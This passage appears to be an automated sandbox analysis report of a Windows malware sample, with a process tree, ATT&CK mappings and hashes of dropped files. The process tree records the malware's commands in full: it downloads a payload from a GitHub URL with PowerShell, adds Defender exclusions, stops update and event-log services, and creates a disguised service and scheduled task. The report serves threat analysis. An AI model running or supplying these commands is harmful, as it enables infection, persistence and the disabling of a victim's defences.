      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffc6b4ddcf8,0x7ffc6b4ddd04,0x7ffc6b4ddd10
      4⤵
      PID:2096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1944,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=1952 /prefetch:2
      4⤵
      PID:1432
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2232,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2240 /prefetch:11
      4⤵
      PID:2084
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2504 /prefetch:13
      4⤵
      PID:4656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3240 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3268
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:6028
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4292,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4316 /prefetch:9
      4⤵
      Uses browser remote debugging
      PID:1928
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4688,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4672 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1524
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5264 /prefetch:14
      4⤵
      PID:5732
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5388,i,18123106460845215745,11428274076504927865,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5504 /prefetch:14
      4⤵
      PID:5284
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:5424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7ffc6bddf208,0x7ffc6bddf214,0x7ffc6bddf220
      4⤵
      PID:2784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1848,i,12531574023117686808,10282863315797037876,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:11
      4⤵
      PID:5220
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2144,i,12531574023117686808,10282863315797037876,262144 --variations-seed-version --mojo-platform-channel-handle=2140 /prefetch:2
      4⤵
      PID:2032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2492,i,12531574023117686808,10282863315797037876,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:13
      4⤵
      PID:4604
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,12531574023117686808,10282863315797037876,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3460,i,12531574023117686808,10282863315797037876,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ukf3w" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3244
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 11
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\gjjvqffs\whoci.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\gjjvqffs\whoci.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- C:\Users\Admin\AppData\Local\gjjvqffs\luytsb.exe
  "C:\Users\Admin\AppData\Local\gjjvqffs\luytsb.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1060
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:3996
- C:\Users\Admin\AppData\Local\gjjvqffs\whoci.exe
  "C:\Users\Admin\AppData\Local\gjjvqffs\whoci.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1440
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5996
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4052
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1072
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5308
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3308
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4048
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:5972
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3532
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3116
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4320
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:5232
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3352
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2080
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:4608

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1204

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1496

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3012
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5592
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3968
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2344
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:564
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3024
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2560
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4296
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3324
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4520
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4048
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2476
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2932
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1648

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1288
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:608

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ukf3w\9h4wbs

Filesize
288KB

MD5
c4d0325ecdc45e06a96cdd8aad434695

SHA1
139b63c8161e87e4e1496a2d43f542f1f20ec9cf

SHA256
7a6edeb0630ddbcad31d0f39660083aeeea367b361313688484f222428031747

SHA512
79524a7d4fc906232610a79a356542dad11cda71c49654485cd5f69da9aab41f20b712ba5ed55e4cd87da76626e51d491362dce7a3ccd760df2e1cb57e020086

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
2d04fbcb2aef9dd1ae7e7ae9296cf036

SHA1
7906b5d67dadf1349753cd518de91175543cd158

SHA256
f70d93dd12f6f85d70ffffea79a37971fff22e60483413f4c86ee72d3941669b

SHA512
4fb98afe8ecb3cf4081719b8d3057015b0d988127b5dbd9735f0638c7673dc08dd563684e5d14f161703d5eb0896334e6b808d55f1facf3ce5268e36dd808c9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
c1194af5e821b9e987c78d729c79533b

SHA1
c26418be4acef65984b2004e71bd08b24bf890d4

SHA256
7b4a444f7e0b274e1eca405460f1ce77164623dc2dc38d5e83e0fb0b3068a4c8

SHA512
300c56dba42b72bc4311f79aeacab55a5c3f7fd55827ad695622baed6a3109d34bf53b5469618e363b8c08d03422b2c5154d5269cc4140bec75b8c7765066736

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
cc75c748a8b9b79e398552f29c9570da

SHA1
251f0064673a46e2f1233da3cb320c996d1d708f

SHA256
18492d42cccaf3f568856e7077ff981ca1280e41cacde87c7868da17dd055099

SHA512
d511687ae1ac3dd4144ed0e6c9a6d0182413bb33f37a1b921c0a087423de27f1c501ee78493683c3db1eab7bddcf5e0d0fed329156b116d386c95f9021b14b5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\f056efb4-df3e-46b0-bdc5-38d13a48e99e\index-dir\the-real-index

Filesize
1KB

MD5
ff3be0779076551a3450e49aea872e13

SHA1
64b30466a8bf3435838ffc6d1ec52d92d85a2439

SHA256
24896f48e79ab692e7d81df5342b369a7fa3f68470c9951a47d21387953dc597

SHA512
0882713c133814d333f1438df0fc5f5c5c12efff651d20891dee691c9c897b99a05fc2644d397f209354bfc0bfc9c58c4457f9ca707ff42da46b288c649f7d7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\f056efb4-df3e-46b0-bdc5-38d13a48e99e\index-dir\the-real-index~RFe57d987.TMP

Filesize
1KB

MD5
6fb017c450496892a404773fa4731284

SHA1
7097111edc3de38edc38d273f9b1e2f0a25e8986

SHA256
d4603edc3c17141b430e04b151750c1901ecae13b368b8bb344fd1e5c83b68c3

SHA512
c108aef5fb016654ab780d4aa83600aec52315f3d30257e5ce88f3980f7d07355c63c75b54a14e6df1ddc3d1511fa8815c0b41c86e84198ee5958d9e55f10f28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
a9f5de4cd1585d3902283f8ba9f0d5cf

SHA1
25cad3707ea0d5a29c6154d2ac6d699868d678b8

SHA256
f924066a7f615d7e954cfde45f275ab8b5fcee5b149b6356efd2ed2ce0f76c14

SHA512
585ab5d8e433864bd227fac76d97fe638a3c8ce0ba9a77c80a337366eb9033b2b61f999a8af2e7361588af68b2d553092212a171394191fa59905c5c810872e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
89e1794a28c846aeb4c411d584794ad4

SHA1
06e3ae272de2a23b22ae5451a36f539545837bf9

SHA256
b2ececa0a630e098d0d7f86ec14c25a00dfb5ecfea5acf706a74b424068a4d0c

SHA512
4c459d33559b9b886790effb59600c260b3162dedfd9672a41758b52935ac44fc54097aa8ed3e2decf91e4cd51bddd220482676e45ba6dad510788e8e36b371a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a3e7c10814e7abcd67d5e702a9e5eab

SHA1
1779fe28d8c694e6b55adde48e04671f01cc7756

SHA256
de79bc5e0cff67f898fbfbb2703c452e873fc97077c1b73f1ffa3f56370f9ad5

SHA512
d1061c312add9de925157623769907d2f054c5d6f2a628f43b58204cb8962c4213d5c33adbc68b145e97a0bf2192c4924a90b4a6d7ceac22e8a3ddcab34f6332

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
432d9f2ceb0442b00dc741f4986d170e

SHA1
17e83955e388ac4b6df1c5f808a4ee3a776119ae

SHA256
ffc88986fd142d6bec58ffa6c5c1ef03795c2e221c94fe9030faa2eddfcb721b

SHA512
cb45d6b8d7d54c3ccc7d167f8acf34ce591ae402c495a33bd26b9afa576ff781a246edc21bc63737dd1653abc95e32c18ed7140d5dc71f6eab4594d40e1cdd32

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4iylkxu.4je.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\gjjvqffs\luytsb.exe

Filesize
27KB

MD5
2ff8e057084b5c180e9b447e08d2d747

SHA1
92b35c1b8f72c18dd3e945743cb93e8531d73e2b

SHA256
accdada8772018e58baa0ecb3e79c507eb09c7d67f22f59e323c74b51eac9072

SHA512
7ae542c6ca36e5ed934ca503f3489144e0ec7d81ad246af88bb525cb494f6725df0aa9131c72afe79ff02364dd65ec7a3ffb01846f99836feff06746193af251

Download Submit
C:\Users\Admin\AppData\Local\gjjvqffs\whoci.exe

Filesize
5.1MB

MD5
cb1ab881df77d5e59c9cd71a042489dd

SHA1
948c65951d6f888dacb567d9938bb21492d82097

SHA256
23fa323eea0a8a6367e810996a54337197c1750a9a0a53c306c8c4022dd94780

SHA512
84a1030a3d2f55ad6fc576bb122d98428485986c1fe4bbd41e13ac1ce588dc3f1034fbe18139f23f9422d520815b4e437b6ac7b78960d0b6c52c56acb87f9c31

Download Submit
C:\Users\Admin\AppData\Local\gjjvqffs\xcnthqwzzfcw.exe

Filesize
137KB

MD5
9d6c51f4f9e0132ea410b8db3c241be6

SHA1
8aa67a34b626f61e6ab053f8a51e7c5142865fe4

SHA256
61d2f6f7051c9b06c87e7c6f8c596b8e4d88382278e4d34d81520bc47e2cba31

SHA512
479dd4703e0b462d7c0cfee5bdcaed97d8888f6c1fb04aad6e6d1a098b5a61701dd19a2635c64cb4cc77038445e5e498fdf8af75d728e5a58988047d3c4e2790

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
memory/1232-554-0x000001BCFC0F0000-0x000001BCFC10C000-memory.dmp

Filesize
112KB

Download
memory/1232-555-0x000001BCFC110000-0x000001BCFC1C3000-memory.dmp

Filesize
716KB

Download
memory/1232-563-0x000001BCFC350000-0x000001BCFC35A000-memory.dmp

Filesize
40KB

Download
memory/1232-562-0x000001BCFC300000-0x000001BCFC306000-memory.dmp

Filesize
24KB

Download
memory/1232-561-0x000001BCFC2F0000-0x000001BCFC2F8000-memory.dmp

Filesize
32KB

Download
memory/1232-560-0x000001BCFC330000-0x000001BCFC34A000-memory.dmp

Filesize
104KB

Download
memory/1232-559-0x000001BCFC1E0000-0x000001BCFC1EA000-memory.dmp

Filesize
40KB

Download
memory/1232-557-0x000001BCFC310000-0x000001BCFC32C000-memory.dmp

Filesize
112KB

Download
memory/1232-556-0x000001BCFC1D0000-0x000001BCFC1DA000-memory.dmp

Filesize
40KB

Download
memory/1648-581-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-579-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-586-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-588-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-584-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-582-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-577-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/1648-585-0x0000000140000000-0x0000000140835000-memory.dmp
